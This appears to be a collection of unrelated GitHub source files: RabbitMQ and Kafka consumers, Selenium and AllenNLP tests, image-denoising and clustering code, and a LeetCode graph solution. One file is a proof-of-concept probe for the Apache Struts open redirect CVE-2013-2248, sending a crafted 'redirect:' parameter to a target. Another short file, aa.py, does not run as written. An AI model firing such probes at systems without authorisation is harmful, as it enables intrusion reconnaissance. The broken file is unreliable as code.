sim_params):\n simulation_input_type = AgentSimulationInput\n\n if method_type == 'random':\n parameter = None\n prioritizer = Pr.Prioritizer\n elif method_type == 'gittins':\n prioritizer = Pr.GittinsPrioritizer\n elif method_type == 'greedy':\n prioritizer = Pr.GreedyPrioritizer\n elif method_type == 'model_free':\n prioritizer = Pr.ModelFreeGittinsPrioritizer\n else:\n raise IOError('unrecognized method type:' + method_type)\n\n return simulation_input_type(method_type, prioritizer, parameter, sim_params)\n","repo_name":"NaamaPearl/GittinsProject","sub_path":"Simulator/Simulator.py","file_name":"Simulator.py","file_ext":"py","file_size_in_byte":15882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4001915048","text":"import pika\nimport cv2\nimport numpy as np\nimport pyautogui\n\n# RabbitMQ configuration\nrabbitmq_host = 'localhost'\nrabbitmq_queue = 'camera_frames'\n\n# Connect to RabbitMQ\nconnection = pika.BlockingConnection(pika.ConnectionParameters(host=rabbitmq_host))\nchannel = connection.channel()\n\n# Declare the queue\nchannel.queue_declare(queue=rabbitmq_queue)\n\n# Get screen dimensions\nscreen_width, screen_height = pyautogui.size()\n\n# Calculate the position to display the image at the bottom-right corner\nimage_width, image_height = 0, 0 # Initialize image dimensions\n\nbCenter = True\n\n# Callback function for receiving messages\ndef receive_message(ch, method, properties, body):\n global bCenter\n # Convert the received byte array to an image\n nparr = np.frombuffer(body, np.uint8)\n image = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n\n # Display the image at the bottom-right corner of the screen\n cv2.imshow('Received Image', image)\n\n if bCenter:\n # Update image dimensions\n image_height, image_width = image.shape[:2]\n\n # Calculate position to display the image at the bottom-right corner\n x = screen_width - image_width\n y = screen_height - image_height\n cv2.moveWindow('Received Image', x, y)\n bCenter = False\n\n # Check for the 'q' key to exit\n if cv2.waitKey(1) & 0xFF == ord('q'):\n exit()\n\n# Consume messages from RabbitMQ\nchannel.basic_consume(queue=rabbitmq_queue, on_message_callback=receive_message, auto_ack=True)\n\n# Start consuming\nchannel.start_consuming()\n","repo_name":"surachairobotic/ws_enserv","sub_path":"rtsp2kafka/rabbitmq2vdo.py","file_name":"rabbitmq2vdo.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2039326014","text":"# coding=utf-8\nfrom test import BaseUITestCase\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select, WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\nimport json\n\n\nclass ChromeIndexTestCase(BaseUITestCase):\n def setUp(self):\n super(ChromeIndexTestCase, self).setUp()\n self.chrome_webdriver = webdriver.Chrome(executable_path=self.chrome_executable_path)\n\n def test_check_load_json(self):\n driver = self.chrome_webdriver\n driver.get(\"http://localhost:8001/\")\n element = driver.find_element_by_xpath(\"//textarea[@ref='query_text']\")\n element.send_keys('{\"~\":[\"id\"]}')\n element = driver.find_element_by_xpath(\"//button[@ref='load_json']\")\n element.click()\n WebDriverWait(driver, 10).until(\n ec.visibility_of_element_located((By.XPATH, \"//div[@ref='load_data_modal']\")))\n element = driver.find_element_by_xpath(\"//textarea[@ref='url_input']\")\n element.send_keys('https://jsonplaceholder.typicode.com/posts/1')\n element = driver.find_element_by_xpath(\"//button[@ref='load_data']\")\n element.click()\n WebDriverWait(driver, 10).until(\n ec.invisibility_of_element_located((By.XPATH, \"//div[@ref='load_data_modal']\")))\n element = driver.find_element_by_xpath(\"//button[@ref='execute_query']\")\n element.click()\n WebDriverWait(driver, 10).until(\n ec.visibility_of_element_located((By.XPATH, \"//table[@ref='data_table']\")))\n element = driver.find_element_by_xpath(\"//table[@ref='data_table']\")\n assert \"dataTable\" in element.get_attribute(\"class\")\n\n def tearDown(self):\n self.chrome_webdriver.close()\n","repo_name":"m19t12/simpleARS-Playground","sub_path":"test/test_chrome_index.py","file_name":"test_chrome_index.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"967721543","text":"import json\nfrom kafka import KafkaConsumer, KafkaProducer\nimport numpy as np \n\n# local module\nimport s3\nimport object_detection\nfrom logger import logger\nfrom config import KAFKA_HOST, KAFKA_PORT, KAFKA_TOPIC_OBJECT_IMAGE, KAFKA_TOPIC_OBJECT_RESULT\n\n\n# parse numpy object to json\ndef numpy_default(obj):\n if type(obj).__module__ == np.__name__:\n if isinstance(obj, np.ndarray):\n return obj.tolist()\n else:\n return obj.item()\n raise TypeError('Unknown type:', type(obj))\n\n\ndef main():\n # Setup Kafka Consumer\n consumer = KafkaConsumer(KAFKA_TOPIC_OBJECT_IMAGE,\n bootstrap_servers='{}:{}'.format(\n KAFKA_HOST, KAFKA_PORT),\n auto_offset_reset='earliest',\n enable_auto_commit=True,\n group_id='object-detection-group')\n # Setup Kafka Producer\n producer = KafkaProducer(\n bootstrap_servers='{}:{}'.format(KAFKA_HOST, KAFKA_PORT))\n\n logger.info(\"Ready to receive messages\")\n\n for message in consumer:\n # de-serialize\n message_str = message.value.decode('utf-8')\n message_json = json.loads(message_str)\n logger.info(\"Input message: %s\", message_str)\n\n # Get image from S3\n image_stream = s3.get_file_stream(message_json['image_path'])\n\n # detect object in image\n detected_image, detections = object_detection.detect(image_stream)\n\n # result message\n result = {\n 'image_path': message_json['image_path'],\n 'detections': detections\n }\n\n # Send result message\n dumped_result = json.dumps(result, default=numpy_default)\n producer.send(KAFKA_TOPIC_OBJECT_RESULT,\n value=dumped_result.encode('utf-8'))\n logger.info(\"Output message: %s\", dumped_result)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"senior-project-spai/object-detection","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5533738173","text":"import os\r\nimport cv2\r\nimport glob\r\nimport numpy as np\r\nimport math\r\n\r\nfrom argparse import ArgumentParser\r\nimport shutil\r\n \r\nparser = ArgumentParser()\r\nparser.add_argument('--loc', help='Folder containing the input')\r\nparser.add_argument('--number_frames', default=70, type=int, help='If the input is a video, set how many frames should be extracted from it')\r\nargs = parser.parse_args()\r\n\r\nif os.path.isdir(f'{args.loc}/image'):\r\n imgs = []\r\n for ext in ['*.png', '*.jpg', '*.JPEG', '*.JPG']:\r\n imgs.extend(glob.glob(os.path.join(f'{args.loc}/image/', ext)))\r\n print(len(imgs))\r\n if len(imgs) < 1:\r\n print(\"There are no images!\")\r\n else:\r\n print(\"Images detected\")\r\nelse:\r\n video_path = glob.glob(os.path.join(f'{args.loc}/*.mp4'))\r\n if len(video_path) == 1:\r\n print(\"Video detected\")\r\n MAX_FRAMES = args.number_frames\r\n\r\n video = cv2.VideoCapture(video_path[0])\r\n if video.isOpened() == False : \r\n print(\"Error\")\r\n\r\n frame_count = int(video.get(cv2.CAP_PROP_FRAME_COUNT))\r\n print(f'Total frames: {frame_count}')\r\n\r\n if frame_count > MAX_FRAMES:\r\n step = math.ceil(frame_count / MAX_FRAMES)\r\n else:\r\n step = 1\r\n\r\n step = 1\r\n\r\n print(f'Step: {step}')\r\n\r\n os.makedirs(f'{args.loc}/image')\r\n\r\n count = 0\r\n written_no = 0\r\n while video.isOpened():\r\n ret, frame = video.read()\r\n if ret == True:\r\n if count % step == 0:\r\n if written_no < 10:\r\n cv2.imwrite(f'{args.loc}/image/00{written_no}.png', frame)\r\n else:\r\n cv2.imwrite(f'{args.loc}/image/0{written_no}.png', frame)\r\n written_no += 1\r\n count += 1\r\n else:\r\n break\r\n else:\r\n print(\"No image or video found\")","repo_name":"ahnaf1393/Learning-Neural-Surface-Representations","sub_path":"check_input.py","file_name":"check_input.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"75192194171","text":"class User:\r\n def __init__(self, username, name, email):\r\n self.username = username\r\n self.name = name\r\n self.email = email\r\n print(\"yuser has ben craeated successfully\")\r\n\r\nmamon = User(m@m0n, mamkundu, mamkundu@gamil.coom)\r\n\r\nprint(mamon.email)","repo_name":"Sagkun343/Hackerrank-","sub_path":"aa.py","file_name":"aa.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"655264527","text":"import requests\nimport re\n\n\n# Vuln Base Info\ndef info():\n return {\n \"author\": \"cckuailong\",\n \"name\": '''Apache Struts - Multiple Open Redirection Vulnerabilities''',\n \"description\": '''Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.''',\n \"severity\": \"low\",\n \"references\": [\n \"https://www.exploit-db.com/exploits/38666\", \n \"https://nvd.nist.gov/vuln/detail/CVE-2013-2248\", \n \"https://cwiki.apache.org/confluence/display/WW/S2-017\"\n ],\n \"classification\": {\n \"cvss-metrics\": \"\",\n \"cvss-score\": \"\",\n \"cve-id\": \"CVE-2013-2248\",\n \"cwe-id\": \"\"\n },\n \"metadata\":{\n \"vuln-target\": \"\",\n \n },\n \"tags\": [\"cve\", \"cve2013\", \"apache\", \"redirect\", \"struts\"],\n }\n\n\n# Vender Fingerprint\ndef fingerprint(url):\n return True\n\n# Proof of Concept\ndef poc(url):\n result = {}\n try:\n url = format_url(url)\n path = '/index.action?redirect:http://www.example.com/'\n\n resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)\n if re.search(r'(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)example\\.com.*$', resp.text): \n result[\"success\"] = True\n result[\"info\"] = info()\n result[\"payload\"] = url+path\n\n except:\n result[\"success\"] = False\n \n return result\n\n\n# Exploit, can be same with poc()\ndef exp(url):\n return poc(url)\n\n\n# Utils\ndef format_url(url):\n url = url.strip()\n if not ( url.startswith('http://') or url.startswith('https://') ):\n url = 'http://' + url\n url = url.rstrip('/')\n\n return url","repo_name":"cckuailong/reapoc","sub_path":"2013/CVE-2013-2248/poc/pocsploit/CVE-2013-2248.py","file_name":"CVE-2013-2248.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":641,"dataset":"github-code","pt":"78"} +{"seq_id":"33115954581","text":"from http import HTTPStatus\n\nfrom backend.extensions import mail\n\n\ndef test_contact_us_endpoint(client, new_msg):\n \"\"\"Test sending valid message to send-email enndoint.\"\"\"\n with mail.record_messages() as outbox:\n rv = client.post(\"/send-email/\", json=new_msg)\n response = rv.get_json()\n\n assert rv.status_code == HTTPStatus.OK\n assert response[\"message\"] == \"Contact message successfully sent\"\n assert len(outbox) == 1\n assert outbox[0].sender == \"test@test.com\"\n assert \"Lorem Ipsum\" in outbox[0].body\n\n\ndef test_contact_us_without_email(client, new_msg):\n \"\"\"Test sending message with no email provided.\"\"\"\n del new_msg[\"email\"]\n rv = client.post(\"/send-email/\", json=new_msg)\n response = rv.get_json()[\"message\"]\n\n assert rv.status_code == HTTPStatus.BAD_REQUEST\n assert response[\"email\"][\"message\"] == \"Valid email is required\"\n\n\ndef test_contact_us_without_content(client, new_msg):\n \"\"\"Test sending message with no content provided.\"\"\"\n del new_msg[\"content\"]\n rv = client.post(\"/send-email/\", json=new_msg)\n response = rv.get_json()[\"message\"]\n\n assert rv.status_code == HTTPStatus.BAD_REQUEST\n assert response[\"content\"][\"message\"] == \"Content of message is required\"\n","repo_name":"jacekkalbarczyk/cfp_aws","sub_path":"backend/tests/test_contact_us.py","file_name":"test_contact_us.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21085903364","text":"import sys\nfastin = sys.stdin.readline\nn = int(fastin())\nk = int(fastin())\nd = [[0] * (k+1) for _ in range(n+1)]\nif n / k < 2 : \n print(0)\n sys.exit()\nif k == 1 : \n print(n)\n sys.exit()\nfor i in range(1,n+1):\n d[i][1] = i\nfor i in range(4,n+1):\n for j in range(2, k+1):\n d[i][j] = d[i-1][j] + d[i-2][j-1]\n\nprint(d[n][k] % 1000000003)","repo_name":"SquirtlesAlgorithmStudy/SquirtlesAlgorithmStudy-S12","sub_path":"의진/Week 12/색상환.py","file_name":"색상환.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"74256664570","text":"from sklearn.model_selection import LeaveOneOut\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn import metrics\r\nfrom sklearn.model_selection import RandomizedSearchCV\r\n\r\n\r\n\r\ndef loo_knn_def(x,y):\r\n global model\r\n loo = LeaveOneOut()\r\n loo.get_n_splits(x)\r\n scores_knn = []\r\n for train_index, test_index in loo.split(x):\r\n\r\n x_treino, x_teste = x[train_index], x[test_index]\r\n y_treino, y_teste = y[train_index], y[test_index]\r\n \r\n model = KNeighborsClassifier(n_neighbors=9, weights= \"uniform\")\r\n model.fit(x_treino,y_treino)\r\n predi = model.predict(x_teste)\r\n scores_knn.append(metrics.accuracy_score(y_teste,predi))\r\n return model\r\n \r\n return model\r\n\r\ndef random_search(x, y):\r\n knn = loo_knn_def(x, y)\r\n parameters = {'n_neighbors':range(1,10),'weights':['uniform','distance']}\r\n rs = RandomizedSearchCV(model,parameters,n_iter=10,refit=True)\r\n rs.fit(x,y)\r\n print(rs.best_params_)","repo_name":"Iagoakiosaito/IA-ChatBot-UFMS","sub_path":"ChatBot/loo_knn.py","file_name":"loo_knn.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13281747994","text":"\"\"\"\nURL of problem:\nhttps://leetcode.com/problems/number-of-provinces/\n\"\"\"\n\n\nfrom collections import deque\n\n\nclass Solution:\n def findCircleNum(self, isConnected):\n \"\"\"\n :type isConnected: List[List[int]]\n :rtype: int\n \"\"\"\n # Time: O(#cities + #connections) - BFS runtime\n # Space: O(#cities) - for unvisited_cities and queue\n # Tags: Graphs, BFS\n num_provinces = 0\n unvisited_cities = set(range(len(isConnected)))\n while unvisited_cities:\n queue = deque([unvisited_cities.pop()])\n num_provinces += 1\n while queue:\n city = queue.popleft()\n for idx, is_nbr in enumerate(isConnected[city]):\n if idx in unvisited_cities and is_nbr:\n unvisited_cities.remove(idx)\n queue.append(idx)\n\n return num_provinces\n\n\n def findCircleNum_DFS(self, isConnected):\n \"\"\"\n :type isConnected: List[List[int]]\n :rtype: int\n \"\"\"\n # A DFS solution\n num_provinces = 0\n unvisited_cities = set(range(len(isConnected)))\n while unvisited_cities:\n stack = [unvisited_cities.pop()]\n num_provinces += 1\n while stack:\n city = stack.pop()\n for idx, is_nbr in enumerate(isConnected[city]):\n if idx in unvisited_cities and is_nbr:\n unvisited_cities.remove(idx)\n stack.append(idx)\n\n return num_provinces\n\n\ndef main():\n print(Solution().findCircleNum([[1, 0, 0], [0, 1, 0], [0, 0, 1]]))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"atg-abhijay/Google-Interview-Prep","sub_path":"Graph/num_provinces_547.py","file_name":"num_provinces_547.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"3014362251","text":"from allennlp.common.testing import AllenNlpTestCase\nfrom allennlp.models.archival import load_archive\nfrom allennlp.predictors import Predictor\nfrom allennlp.nn import util\n\n\nclass TestPredictor(AllenNlpTestCase):\n def test_from_archive_does_not_consume_params(self):\n archive = load_archive(\n self.FIXTURES_ROOT / \"simple_tagger\" / \"serialization\" / \"model.tar.gz\"\n )\n Predictor.from_archive(archive, \"sentence_tagger\")\n\n # If it consumes the params, this will raise an exception\n Predictor.from_archive(archive, \"sentence_tagger\")\n\n def test_loads_correct_dataset_reader(self):\n # This model has a different dataset reader configuration for train and validation. The\n # parameter that differs is the token indexer's namespace.\n archive = load_archive(\n self.FIXTURES_ROOT / \"simple_tagger_with_span_f1\" / \"serialization\" / \"model.tar.gz\"\n )\n\n predictor = Predictor.from_archive(archive, \"sentence_tagger\")\n assert predictor._dataset_reader._token_indexers[\"tokens\"].namespace == \"test_tokens\"\n\n predictor = Predictor.from_archive(\n archive, \"sentence_tagger\", dataset_reader_to_load=\"train\"\n )\n assert predictor._dataset_reader._token_indexers[\"tokens\"].namespace == \"tokens\"\n\n predictor = Predictor.from_archive(\n archive, \"sentence_tagger\", dataset_reader_to_load=\"validation\"\n )\n assert predictor._dataset_reader._token_indexers[\"tokens\"].namespace == \"test_tokens\"\n\n def test_get_gradients(self):\n inputs = {\n \"sentence\": \"I always write unit tests\",\n }\n\n archive = load_archive(\n self.FIXTURES_ROOT / \"basic_classifier\" / \"serialization\" / \"model.tar.gz\"\n )\n predictor = Predictor.from_archive(archive)\n\n instance = predictor._json_to_instance(inputs)\n predictor._dataset_reader.apply_token_indexers(instance)\n outputs = predictor._model.forward_on_instance(instance)\n labeled_instances = predictor.predictions_to_labeled_instances(instance, outputs)\n for instance in labeled_instances:\n grads = predictor.get_gradients([instance])[0]\n assert \"grad_input_1\" in grads\n assert grads[\"grad_input_1\"] is not None\n assert len(grads[\"grad_input_1\"][0]) == 5 # 9 words in hypothesis\n\n def test_get_gradients_when_requires_grad_is_false(self):\n inputs = {\n \"sentence\": \"I always write unit tests\",\n }\n\n archive = load_archive(\n self.FIXTURES_ROOT\n / \"basic_classifier\"\n / \"embedding_with_trainable_is_false\"\n / \"model.tar.gz\"\n )\n predictor = Predictor.from_archive(archive)\n\n # ensure that requires_grad is initially False on the embedding layer\n embedding_layer = util.find_embedding_layer(predictor._model)\n assert not embedding_layer.weight.requires_grad\n instance = predictor._json_to_instance(inputs)\n predictor._dataset_reader.apply_token_indexers(instance)\n outputs = predictor._model.forward_on_instance(instance)\n labeled_instances = predictor.predictions_to_labeled_instances(instance, outputs)\n # ensure that gradients are always present, despite requires_grad being false on the embedding layer\n for instance in labeled_instances:\n grads = predictor.get_gradients([instance])[0]\n assert bool(grads)\n # ensure that no side effects remain\n assert not embedding_layer.weight.requires_grad\n\n def test_captures_model_internals(self):\n inputs = {\"sentence\": \"I always write unit tests\"}\n\n archive = load_archive(\n self.FIXTURES_ROOT\n / \"basic_classifier\"\n / \"embedding_with_trainable_is_false\"\n / \"model.tar.gz\"\n )\n predictor = Predictor.from_archive(archive)\n\n with predictor.capture_model_internals() as internals:\n predictor.predict_json(inputs)\n\n assert len(internals) == 10\n\n with predictor.capture_model_internals(r\"_text_field_embedder.*\") as internals:\n predictor.predict_json(inputs)\n assert len(internals) == 2\n\n def test_predicts_batch_json(self):\n inputs = {\"sentence\": \"I always write unit tests\"}\n\n archive = load_archive(\n self.FIXTURES_ROOT\n / \"basic_classifier\"\n / \"embedding_with_trainable_is_false\"\n / \"model.tar.gz\"\n )\n predictor = Predictor.from_archive(archive)\n results = predictor.predict_batch_json([inputs] * 3)\n assert len(results) == 3\n","repo_name":"allenai/allennlp","sub_path":"tests/predictors/predictor_test.py","file_name":"predictor_test.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","stars":11609,"dataset":"github-code","pt":"78"} +{"seq_id":"1663288295","text":"\"\"\"\nStores the Image class, and its subclasses.\n\"\"\"\n\nfrom typing import List, Tuple\n\nimport numpy as np\nfrom PIL import Image as PILImage\nimport pywt\nfrom scipy.ndimage import uniform_filter, gaussian_filter\nfrom sklearn.cluster import DBSCAN\n\nfrom .cluster import Cluster\n\n\ndef _wavelet_freqs_below_length_scale(length_scale: int, wavelet_type: str):\n \"\"\"\n Calculates the number of wavelet frequency scales that exist below the\n given length scale.\n \"\"\"\n if wavelet_type != \"sym4\":\n raise NotImplementedError(\n \"The only implemented wavelet choice is 'sym4'. If you would \" +\n \"like a different wavelet type, please raise an issue on the \" +\n \"local_stats github page.\")\n # Wavelet length scales increase by powers of 2.\n return int(np.floor(np.log2(length_scale)))\n\n\nclass Image:\n \"\"\"\n The base class for all images.\n\n Attrs:\n image_array:\n Numpy array representing the image.\n \"\"\"\n\n def __init__(self, image_array: np.ndarray) -> None:\n self.image_array = image_array\n\n @classmethod\n def from_file(cls, path_to_file: str):\n \"\"\"\n Instantiates an image from a path to a data file that can be opened\n using PIL.Image.open().\n\n Args:\n path_to_file:\n The path to the image file of interest.\n\n Returns:\n An instance of Image.\n \"\"\"\n return cls(np.array(PILImage.open(path_to_file)).astype(np.float64))\n\n def subtract_background(self, background_array: np.ndarray,\n zero_clip=True) -> None:\n \"\"\"\n Carried out a simple background subtraction on self.image_array. If\n zero_clip is true, then any pixels in image_array that are decreased\n below zero by the background subtraction will be clipped to zero. This\n is particularly useful if there's a hot pixel in your background array.\n\n Args:\n background_array:\n A numpy array representing the background to be subtracted.\n OR\n An instance of Image representing the background.\n zero_clip:\n Boolean determining if the background subtracted image_array\n should be clipped at 0.\n \"\"\"\n if isinstance(background_array, type(self)):\n background_array = background_array.image_array\n self.image_array -= background_array\n if zero_clip:\n self.image_array = np.clip(self.image_array, 0, np.inf)\n\n def wavelet_denoise(self,\n signal_length_scale: int = 20,\n cutoff_factor: float = 0.2,\n max_cutoff_factor: float = 0.8,\n wavelet_choice: str = \"sym4\") -> None:\n \"\"\"\n Runs some wavelet denoising on the image. Without arguments, will run\n default denoising.\n\n Args:\n signal_length_scale:\n We would like to preferentially rotate our image away from\n wavelets whose length-scales are decently smaller than our\n signal length scale. This is the most important parameter for\n decimating noise wavelets. A value of 20 will kill most typical\n noise wavelets, but if your signal length scale is significantly\n larger than 20 pixels then it may be productive to increase this\n number.\n cutoff_factor:\n If any wavelet coefficient is less than cutoff_factor*(maximum\n wavelet coefficient), then set it to zero. The idea is that\n small coefficients are required to represent noise; meaningful\n data, as long as it is large compared to background, will\n require large coefficients to be constructed in the wavelet\n representation.\n max_cutoff_factor:\n The cutoff factor to be applied to signal occuring on length\n scales much smaller than signal_length_scale.\n wavelet_choice:\n Fairly arbitrary. Sym4 is the only currently supported wavelet.\n Look at http://wavelets.pybytes.com/ for more info. If you want\n a new wavelet supported, please feel free to raise an issue on\n the github page.\n \"\"\"\n # Work out how many high frequency levels will have the max_cutoff\n # applied to them.\n max_noise_length = signal_length_scale/2\n max_cutoff_levels = _wavelet_freqs_below_length_scale(max_noise_length,\n wavelet_choice)\n\n # Get the wavelet coefficients; cast them to a mutable type.\n coeffs = list(pywt.wavedec(self.image_array, wavelet_choice))\n # Work out the largest wavelet coefficient.\n max_coeff = 0\n for arr in coeffs:\n max_coeff = np.max(arr) if np.max(arr) > max_coeff else max_coeff\n\n # Get min_coeff from the arguments to this method.\n min_coeff = max_coeff*cutoff_factor\n high_freq_min_coeff = max_coeff*max_cutoff_factor\n\n for i in range(max_cutoff_levels):\n idx = -(i+1)\n coeffs[idx] = np.where(\n ((coeffs[idx] > high_freq_min_coeff).any() or\n (coeffs[idx] < -high_freq_min_coeff).any()).any(),\n coeffs[idx], 0)\n\n # Apply the decimation.\n coeffs = [np.where(\n ((arr > min_coeff).any() or (arr < -min_coeff).any()).any(), arr, 0\n ) for arr in coeffs]\n\n # Invert the wavelet transformation.\n self.image_array = pywt.waverec(coeffs, wavelet_choice)\n\n def _significance_levels(self, signal_length_scale: int,\n bkg_length_scale: int) -> np.ndarray:\n \"\"\"\n Returns an image of the local significance level of every pixel in the\n image.\n\n TODO: this should be replaced by optimized numpy extension function.\n\n Args:\n signal_length_scale:\n The length scale over which signal is present. This is usually\n just a few pixels for typical magnetic diffraction data.\n bkg_length_scale:\n The length scale over which background level varies in a CCD\n image. If your CCD is perfect, you can set this to the number\n of pixels in a detector, but larger numbers will run more\n slowly. Typically something like 1/10th of the number of pixels\n in your detector is probably sensible.\n\n Returns:\n Array of standard deviations between the mean and each pixel.\n \"\"\"\n # Compute local statistics.\n local_signal = gaussian_filter(\n self.image_array, int(signal_length_scale/3))\n local_bkg_levels = uniform_filter(local_signal, bkg_length_scale)\n local_deviation = np.std(local_signal)\n\n return np.abs((local_signal - local_bkg_levels)/local_deviation)\n\n def _significant_pixels(self, signal_length_scale: int,\n bkg_length_scale: int,\n n_sigma: float = 4,\n significance_mask: np.ndarray = None) -> None:\n \"\"\"\n Returns a significance map of the pixels in self.data.\n\n Args:\n signal_length_scale:\n The length scale over which signal is present. This is usually\n just a few pixels for typical magnetic diffraction data.\n bkg_length_scale:\n The length scale over which background level varies in a CCD\n image. If your CCD is perfect, you can set this to the number\n of pixels in a detector, but larger numbers will run more\n slowly. Typically something like 1/10th of the number of pixels\n in your detector is probably sensible.\n n_sigma:\n The number of standard deviations above the mean that a pixel\n needs to be to be considered significant.\n \"\"\"\n # Compute significance; return masked significance. Significant if\n # pixel is more than 4stddevs larger than the local average.\n significant_pixels = np.where(self._significance_levels(\n signal_length_scale, bkg_length_scale) > n_sigma, True, False)\n\n # If a mask was provided, use it.\n if significance_mask is not None:\n return np.logical_and(significant_pixels,significance_mask)\n return significant_pixels\n\n def mask_from_clusters(self, clusters: List[Cluster]) -> np.ndarray:\n \"\"\"\n Generates a mask array from clusters.\n\n Args:\n clusters:\n A list of the cluster objects that we'll use to generate our\n mask.\n\n Returns:\n A boolean numpy mask array.\n \"\"\"\n # Make an array of zeros of the correct size for this image; every\n # pixel is a mask by default.\n mask = np.full_like(self.image_array,False)\n\n for cluster in clusters:\n mask[cluster.pixel_indices[1], cluster.pixel_indices[0]] = True\n return mask\n\n def cluster(self,\n signal_length_scale: int,\n bkg_length_scale: int,\n n_sigma: float = 4,\n significance_mask: np.ndarray = None,\n frac_pixels_needed: float = 1/np.pi) -> List[Cluster]:\n \"\"\"\n Returns the clustered significant pixels. Does significance calculations\n here under the hood.\n\n Args:\n signal_length_scale:\n The length scale over which signal is present. This is usually\n just a few pixels for typical magnetic diffraction data.\n bkg_length_scale:\n The length scale over which background level varies in a CCD\n image. If your CCD is perfect, you can set this to the number\n of pixels in a detector, but larger numbers will run more\n slowly. Typically something like 1/10th of the number of pixels\n in your detector is probably sensible.\n n_sigma:\n The number of standard deviations above the mean that a pixel\n needs to be to be considered significant.\n significance_mask:\n Pixels that should never be considered to be statistically\n significant (useful if, for example, stats are biased in this\n region due to a physical barrier like a beamstop).\n frac_pixels_needed:\n The fraction of pixels within a distance of signal_length_scale\n of a pixel that need to also be statistically significant for\n the clustering algorithm to class that pixel as being a core\n point in a cluster. Defaults to 1/pi.\n \"\"\"\n # Do the significance calculation.\n significant_pixels = self._significant_pixels(\n signal_length_scale, bkg_length_scale, n_sigma, significance_mask)\n # Get the significant pixels.\n pixels_y, pixels_x = np.where(significant_pixels == True)\n\n # Massage these pixels into the form that sklearn wants to see.\n pixel_coords = np.zeros((len(pixels_x), 2))\n pixel_coords[:, 0] = pixels_x\n pixel_coords[:, 1] = pixels_y\n\n # If there are no significant pixels, return an empty list.\n if len(pixel_coords) == 0:\n return []\n\n # Run the DBSCAN algorithm, setting eps and min_samples according to our\n # expected signal_length_scale.\n dbscan = DBSCAN(\n eps=signal_length_scale,\n min_samples=frac_pixels_needed*np.pi*signal_length_scale**2\n ).fit(pixel_coords)\n\n return Cluster.from_DBSCAN(pixel_coords, dbscan.labels_)\n\n\nclass DiffractionImage(Image):\n \"\"\"\n A container for images obtained as a result of a diffraction experiment.\n \"\"\"\n\n def __init__(self, image_array: np.ndarray,\n beam_centre: Tuple[int]) -> None:\n super().__init__(image_array)\n raise NotImplementedError()\n self.beam_centre = beam_centre\n\n @property\n def _pixel_dx(self):\n \"\"\"\n Returns the horizontal distance between each pixel and the beamstop.\n \"\"\"\n horizontal_x = np.arange(0, self.image_array.shape[1])\n horizontal_dx = horizontal_x - self.beam_centre[0]\n pixel_dx = np.zeros_like(self.image_array)\n for col in range(self.image_array.shape[1]):\n pixel_dx[:, col] = horizontal_dx[col]\n\n return pixel_dx\n\n @property\n def _pixel_dy(self):\n \"\"\"\n Returns the vertical distance between each pixel and the beamstop.\n \"\"\"\n vertical_y = np.arange(self.image_array.shape[0]-1, -1, -1)\n vertical_dy = vertical_y - (\n self.image_array.shape[0] - 1 - self.beam_centre[1]\n )\n pixel_dy = np.zeros_like(self.image_array)\n for row in range(self.image_array.shape[0]):\n pixel_dy[row, :] = vertical_dy[row]\n\n return pixel_dy\n\n @property\n def pixel_radius(self):\n \"\"\"\n Returns each pixel's radial distance from the beam centre, in units of\n pixels.\n \"\"\"\n return np.sqrt(np.square(self._pixel_dx) + np.square(self._pixel_dy))\n\n @property\n def pixel_chi(self):\n \"\"\"\n Returns each pixel's azimuthal rotation for a polar coordinate mapping.\n This is equivalent to the typical diffraction motor chi.\n \"\"\"\n return np.arctan2(self._pixel_dx, self._pixel_dy)\n","repo_name":"RBrearton/local_stats","sub_path":"src/local_stats/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":13701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31762981423","text":"#!/usr/bin/env python3\nimport os, logging\nimport feed_reader\nimport asyncio\nimport datetime as dt\nfrom datetime import datetime\nimport pytz\nfrom bs4 import BeautifulSoup\nfrom flask import Flask, request, url_for, render_template, jsonify\nfrom flask_httpauth import HTTPBasicAuth\nfrom flask_cors import CORS\nimport urllib\nfrom tabulate import tabulate\n\nloop = asyncio.get_event_loop()\napp = Flask(__name__)\nCORS(app)\nauth = HTTPBasicAuth()\n\ndef process_feeds(feeds):\n \"\"\"Modify feed data before passing to rendering\"\"\"\n prev_source = ''\n prev_date_str = ''\n for feed in feeds:\n summary_raw 